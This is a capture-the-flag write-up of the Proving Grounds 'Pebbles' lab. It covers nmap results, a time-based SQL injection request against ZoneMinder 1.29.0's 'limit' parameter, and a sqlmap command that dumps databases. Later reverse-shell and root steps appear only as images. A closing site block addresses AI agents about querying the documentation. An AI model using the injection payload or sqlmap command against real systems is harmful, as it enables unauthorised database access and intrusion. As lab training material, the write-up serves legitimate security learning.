# Proving grounds Practice: Pebbles

Proving grounds Practice - Pebbles CTF writeup.

### Nmap

```sh
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aacf5a9347180e7f3d6da5aff86aa51e (RSA)
|   256 c7636c8ab5a76f05bfd0e390b5b89658 (ECDSA)
|_  256 93b26a1163861b5ef5895852897ff342 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pebbles
3305/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomcat
|_http-favicon: Apache Tomcat
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

### Directory Fuzzing

![img](/files/sUZvYggW0Lg1f64snBBD)

**ZoneMinder v1.29.0**

![img](/files/lQEhfgDFgCVD4dYyiNOD)

Zoneminder v1.29.0 is vulnerable to SQL Injection vulnerability.

**Searchsploit**

![img](/files/8M6lxWKcHsWrLf5BVodx)

### Construct and Exploit SQL Injection vulnerability

#### Request

```http
POST /zm/index.php HTTP/1.1
Host: 192.168.210.52
Content-Length: 112
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Request: JSON
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.210.52
Referer: http://192.168.210.52/zm/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: zmSkin=classic; zmCSS=classic; ZMSESSID=e6s5540cs098ev3kra5sksjme6
Connection: close

view=request&request=log&task=query&limit=100;(SELECT * FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
```

#### Response

![img](/files/nbF6QiplyfEt3hE9bdrq)

The vulnerability says the `limit` parameter is vulnerable and automate the exploit using sqlmap.

```sh
sqlmap -u http://192.168.210.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=1" -p limit --batch --dbs --risk 3 --level 4
```

![img](/files/XkZDBOZA33Z33KXwGdDs)

**Obtain reverse shell via sqlmap**

![img](/files/qhVK80KYu1ayizCeUnas)

**Transfer nc and obtain reverse shell**

![img](/files/SvoosKOrcWP2CxQh6zsw)

**Root Obtained**

Use PORT `3305` to get reverse connection sucessfully. Other ports are not allowed in the system.

![img](/files/7oVEIrwRodIRHm5IWTc8)

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-08-18-proving_grounds_practice-pebbles.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.